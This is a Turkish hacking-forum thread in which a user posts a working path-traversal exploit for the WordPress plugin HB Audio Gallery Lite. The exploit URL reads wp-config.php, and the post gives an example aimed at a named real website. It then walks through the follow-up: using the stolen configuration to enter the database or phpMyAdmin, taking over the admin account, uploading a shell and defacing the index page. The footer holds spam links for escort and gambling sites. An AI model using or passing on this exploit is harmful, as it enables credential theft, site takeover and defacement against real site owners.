Wordpress Plugin HB Audio Gallery Lite Açığı

SkullZ

Forumdan Uzaklaştırıldı
Katılım
6 Mar 2016
Mesajlar
154
Tepkime puanı
0
Puanları
0
Bugün sizlere Wordpress Plugin HB Audio Gallery Lite açığını göstereceğim;

Google Dork:
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!

Vuln Dosya: gallery/audio-download.php

Exploit: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Örneğin;
frenchandindianwarfoundation.org/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Config'i çektikten sonra ne yapacağınızı bilmiyorsanız ?
Nacivat yardımı ile sitenin veritabanına giriyoruz veya phpmyadmin'e girebilirseniz o da olur. Daha sonra veritabanından userleri buluyoruz ve admini giriyoruz. İşlem bu kadardır. daha sonrası shell ve index. :D
 

LastHacker

Spys-Z
Katılım
26 Tem 2015
Mesajlar
509
Tepkime puanı
0
Puanları
0
Yaş
25
Web sitesi
frmjoker.com
Bakalım
 

mersin escort bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort bursa travesti https://vipankaratravesti.com/ meritking giriş
Üst
Copyright® Ajanlar.org 2012